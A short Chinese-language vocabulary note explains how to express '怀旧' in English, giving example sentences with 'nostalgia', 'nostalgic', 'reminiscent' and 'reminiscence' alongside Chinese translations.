“怀旧”在英文中该如何表达？
我们常说的“怀旧气息”便是“a smell of nostalgia”。
“nostalgia”便是“怀旧”的意思。比如说：I was filled with nostalgia by hearing my favourite old song. （我听到这首喜爱的旧歌，心中充满了怀旧之情。）
Perhaps it is our human nature to be nostalgic. （也许是人类天生有一种思古之幽情。）
此外我们也可以用“reminiscent”来表示“怀旧的，回忆往事的”，比如："Those were the days," agreed Barrow with a reminiscent sigh. （“那些日子真让人留恋，”巴罗叹了口气附和着，流露出对往事的怀念。）
其名词“reminiscence”便是我们常说的“回忆录”了，比如说：reminiscences of the war (战争回忆录)等。 |
